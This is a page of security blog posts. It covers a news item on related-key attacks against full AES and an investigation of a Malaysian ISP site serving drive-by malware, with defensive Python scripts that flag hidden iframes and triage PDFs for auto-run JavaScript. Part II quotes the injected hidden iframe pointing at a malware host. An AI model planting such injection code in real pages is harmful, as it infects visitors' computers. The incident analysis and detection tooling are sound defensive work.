
Related-key Cryptanalysis of the Full AES-192 and AES-256

Cryptographers Alex Biryukov and Dmitry Khovratovich have recently published a paper called "Related-key Cryptanalysis of the Full AES-192 and AES-256". In this paper they present two new related-key attacks on the full AES that are better than brute force; the AES-256 attack has a complexity of 2^119.

Here is the abstract:
Abstract. In this paper we present two related-key attacks on the full AES. For AES-256 we show the first key recovery attack that works for all the keys and has complexity 2^119, while the recent attack by Biryukov-Khovratovich-Nikolic works for a weak key class and has higher complexity. The second attack is the first cryptanalysis of the full AES-192. Both our attacks are boomerang attacks, which are based on the recent idea of finding local collisions in block ciphers and enhanced with the boomerang switching techniques to gain free rounds in the middle.

Bruce Schneier has something to say about it here on his blog.

TMonline is a harmful website!!??? (Part II)

I have been looking more into the matter of www.tmonline.com.my and found some more answers.

In the source code of the website, I found this:
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<iframe src="http://gianthighest.cn:8080/index.php" width=120 height=176 style="visibility: hidden"></iframe>
<div align="center">

OK, so what is this gianthighest.cn? It doesn't seem to belong to TM.

Going to the site, I didn't get any clues as I got a blank page. So that was disappointing... I was expecting to see some code. So I searched for more information.

Google has a tool called the Safe Browsing diagnostic tool. To use it, just append a URL to the end of http://www.google.com/safebrowsing/diagnostic?site=. So let's test... http://www.google.com/safebrowsing/diagnostic?site=www.tmonline.com.my. Here is the result.

Here we see that malicious software is being hosted on gianthighest.cn. And Google confirms that when they visited the site, 2 out of 3 pages tested resulted in malicious software being downloaded and installed without user consent.

OK, good, maybe we are getting somewhere here.

After hitting lots of dead ends, I finally found something called .cn iframe attacks. Here are the links: http://blog.unmaskparasites.com/2009/06/25/hidden-cn-iframes-are-still-p... and http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from...

Basically what is happening is, as the code I pasted above indicates, a hidden iframe was injected into the website. This iframe loads a script that checks which plugins are installed in your browser. Depending on the results of this check, it serves either a malicious PDF or a malicious SWF file.

What I detected was the PDF file, and I got results similar to what was posted on http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from...: a stack-based buffer overflow.

A check on www.tmonline.com.my using Unmask Parasites tells me:

This page seems to be <suspicious>
1 hidden external link found.
Google currently lists this page as suspicious*

And it goes on to give me a detailed security report on what is suspicious on the page. Here is a screenshot.

If your server has been compromised, you can clean your server by doing the following (taken from http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from...):

  1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
  2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
  3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
  4. Now remove the malicious code (the iframes) from your files on the server. The easiest way to do it is to upload clean content from a backup.
  5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
  6. If your site was flagged by Google, request a malware review via Webmaster Tools.
  7. Regularly check your site with diagnostics tools of your choice (Unmask Parasites can be one of them) to be sure your site is clean.
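A way to automate both the hidden-iframe check described above and steps 4 and 5 of the cleanup list, as an added example that is not the author's or Unmask Parasites' code: it parses iframe tags out of HTML and flags any that are CSS-hidden, only a few pixels in size, or pointing at a host outside the site. The sample HTML is constructed around the injected tag quoted in this post, and the list of the site's own hostnames is an assumption.

```python
import re
from urllib.parse import urlparse
# Hostnames the site legitimately frames content from (assumption for this example).
OWN_HOSTS = {"www.tmonline.com.my", "tmonline.com.my"}
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')

def parse_attrs(attr_text):
    """Map attribute name -> value for one tag; handles quoted and bare values."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs

def is_hidden(attrs):
    """True for CSS-hidden frames or frames only a few pixels in size."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        return True
    try:
        return int(attrs.get("width", 999)) < 5 or int(attrs.get("height", 999)) < 5
    except ValueError:
        return False

def find_suspicious_iframes(html, own_hosts=OWN_HOSTS):
    """Return (src, reason) for each iframe that is hidden or points off-site."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        reasons = []
        if host and host not in own_hosts:
            reasons.append("external host " + host)
        if is_hidden(attrs):
            reasons.append("hidden")
        if reasons:
            findings.append((src, ", ".join(reasons)))
    return findings

# Constructed sample: the injected tag quoted in this post plus a benign same-site frame.
SAMPLE_HTML = ('<body leftmargin="0"><iframe src="http://gianthighest.cn:8080/index.php" '
               'width=120 height=176 style="visibility: hidden"></iframe>'
               '<iframe src="http://www.tmonline.com.my/news.html" width=600 height=400>'
               '</iframe><div align="center">')

if __name__ == "__main__":
    for src, reason in find_suspicious_iframes(SAMPLE_HTML):
        print("SUSPICIOUS iframe -> %s (%s)" % (src, reason))
```

Loop it over every .html and .php file under the web root (for example with os.walk) to find the injected copies step 5 asks you to hunt for; it only sees literal iframe tags, so frames written by obfuscated JavaScript need the script itself inspected.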

Good.

Now how do we report this to TM? Can anybody tell me or help out, please?

TMonline is a harmful website!!??? (Part 1)

H.S. Tan, a friend of mine, sent me an email today. He said that he googled "tm online" and the first result he got pointed to www.tm.online.com.my (please be careful when navigating to this site). But there was a problem: Google reports "This site may harm your computer." So he was concerned about whether the website had been hijacked.

Telekom Malaysia (TM) is the biggest ISP in Malaysia, so it would be serious if there were something wrong with this website, since lots of people visit it. So I set about figuring out why Google says this site is harmful. What I found is a bit shocking.

Below was my answer to him.

Yes, it is a malicious website :) No, really, it is. Below is my brief analysis after looking at the site for a few minutes.

The thing is... on this website there is an exploit that is being called Exploit.JS.Pdfka.lr. You might not see it, but whenever you visit the site, your browser will automatically and unexpectedly download a PDF. There is a big chunk of obfuscated JavaScript in the PDF. If you are on Windows and you are using Adobe Acrobat, this file might cause Acrobat to stall while it does its malicious tasks.

There are many versions of this PDF exploit already in the wild. I don't know what this particular version of the exploit does as there is very little information about it. There are versions that attempt to write files to your hard drive. There are also versions that put an extra task on your computer (if you view the Task Manager) and attempt to send out spam.

Adobe has released security updates for their software in response to these PDF exploits. So make sure you install Adobe's updates. Other PDF viewers should have similar security updates as well.

Some notes:

- If you are using Windows on a limited account, you are golden and it is a very wise decision. NoScript in Firefox and AdBlock or AdBlock Plus are good too. Having good anti-malware and anti-virus software installed will also help.

- I wonder what TM is trying to do on their website. Hmm...

- I would like to get the malicious code and deobfuscate it. I'm still wondering how I can do this. I need to study and do more research.

Update: I did more research. A part II is now available here.
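The PDF in this post carries its exploit as JavaScript inside the file, and a first triage step before any deobfuscation is to look for the PDF name tokens that mark script and auto-run actions. This is an added example, not the author's code or any vendor's signature: it normalises the #xx hex escapes that malicious files use to disguise names such as /JS, and the sample PDF bytes are constructed (a harmless app.alert). It does not inflate compressed object streams, so names hidden there need the streams decoded first.

```python
import re

# PDF names that mark script or auto-launch behaviour. A name may be written with
# #xx hex escapes (e.g. /J#53 for /JS), so every name is decoded before comparison.
RISKY_NAMES = {"/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile"}
NAME_RE = re.compile(rb"/[^\s/<>\[\]()%]+")

def normalise_name(raw):
    """Decode PDF #xx escapes so /J#53 and /JS compare equal."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")

def pdf_indicators(data):
    """Return the sorted risky names present in the raw (uncompressed) PDF bytes."""
    found = set()
    for m in NAME_RE.finditer(data):
        name = normalise_name(m.group(0))
        if name in RISKY_NAMES:
            found.add(name)
    return sorted(found)

def triage(data):
    """Rate a file: script that runs automatically on open is the drive-by pattern."""
    names = set(pdf_indicators(data))
    has_js = bool(names & {"/JavaScript", "/JS"})
    auto_run = bool(names & {"/OpenAction", "/AA"})
    if has_js and auto_run:
        return "high", sorted(names)
    if has_js or names & {"/Launch", "/EmbeddedFile"}:
        return "medium", sorted(names)
    return "low", sorted(names)

# Constructed sample: a minimal PDF skeleton whose OpenAction runs hex-escaped /J#53 code.
SAMPLE_PDF = (b"%PDF-1.4\n"
              b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
              b"3 0 obj << /S /J#61vaScript /J#53 (app.alert('constructed sample')) >> endobj\n"
              b"trailer << /Root 1 0 R >>\n%%EOF\n")

if __name__ == "__main__":
    level, names = triage(SAMPLE_PDF)
    print("risk=%s indicators=%s" % (level, " ".join(names)))
```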

azrinmadin.com is back!

Hello there!

Yes, azrinmadin.com is back. I've deleted all the old content and will write up new articles here. The old content wasn't much anyway, only a few blog entries related to several security news but wasn't updated often. In this new site, there will be new sections so that content won't be as mixed up as before.

So what am I going to put on here? Well, just some thoughts and ideas on stuff that I deal with every day. Mostly it will be security related.

I will try to update often.
